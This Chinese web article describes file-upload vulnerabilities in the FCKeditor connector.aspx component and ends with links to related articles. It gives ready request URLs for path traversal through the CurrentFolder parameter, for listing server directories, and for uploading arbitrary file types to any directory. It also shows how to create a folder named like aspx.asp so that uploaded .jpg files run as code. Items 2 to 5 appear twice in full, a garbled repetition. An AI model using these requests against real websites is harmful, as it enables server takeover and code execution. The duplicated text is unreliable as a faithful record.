FCKeditor 新聞組件的一些程序漏洞
更新時間:2009年04月28日 20:14:44 作者:
很多網(wǎng)站可能都在用FCK的新聞編輯組件,使用FCK的時候一定要注意版本是否安全,以下是FCK中的文件上傳漏洞:(主要是:connector.aspx文件的漏洞)
1 CurrentFolder 參數(shù),可以在網(wǎng)站中不同目錄新建文件夾,參數(shù)使用 ../../來篡改參數(shù),進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 上傳文件時,通過修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 同時修改Type 和CurrentFolder 參數(shù),可以上傳任意類型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp
5 通過創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2 CurrentFolder 參數(shù),根據(jù)返回的XML信息可以查看網(wǎng)站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到?jīng)]有權(quán)限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 上傳文件時,通過修改CurrentFolder參數(shù),可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 同時修改Type 和CurrentFolder 參數(shù),可以上傳任意類型文件到網(wǎng)站任意目錄,基本上網(wǎng)站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp
5 通過創(chuàng)建文件夾的功能,創(chuàng)建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執(zhí)行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執(zhí)行。
相關(guān)文章
徹底解決ewebeditor網(wǎng)站后臺不能上傳圖片的方法
隨著windows操作系統(tǒng)和IE瀏覽器版本的不斷推出,很多客戶都漸漸放棄了IE6,IE7,使用上了IE8瀏覽器,但是突然發(fā)現(xiàn)自己網(wǎng)站后臺里面的eWebEditor文本編輯器的插入圖片等等按鈕失效了,鼠標(biāo)點擊后什么反應(yīng)都沒有,IE瀏覽器左下角顯示一個黃色的感嘆號提示錯誤,就以為是網(wǎng)站空間、服務(wù)器中毒了呢,一時間紛紛都來找我們詢問2012-03-03
javascript fckeditor編輯器取值與賦值實現(xiàn)代碼
這篇文章對于使用fckeditor編輯器的朋友是個不錯應(yīng)用,主要介紹的是js對fckeditor的取值與賦值操作,fckeditor是個不錯的比較方便的擴展功能的編輯器。2010-05-05
FCKeditor編輯器添加圖片上傳功能及圖片路徑問題解決方法
現(xiàn)在很多CMS系統(tǒng)因為安全原因會把后臺編輯器里的上傳功能給去除,但這樣一來對實際使用過程造成了很多麻煩,今天我們以ASPCMS系統(tǒng)的FCKeditor編輯器為例,說明一下如何增加圖片上傳功能2014-04-04
ckeditor syntaxhighlighter代碼高亮插件配置分享
現(xiàn)在大家可以不必像我這樣為了實現(xiàn)代碼高亮的功能,去修改ckeditor編輯器,大家可以去使用百度編輯器(Ueditor)他有代碼高亮的功能,還蠻好用的,我的個人網(wǎng)站就是的百度編輯器的。歡迎大家去我的博客看看2014-12-12

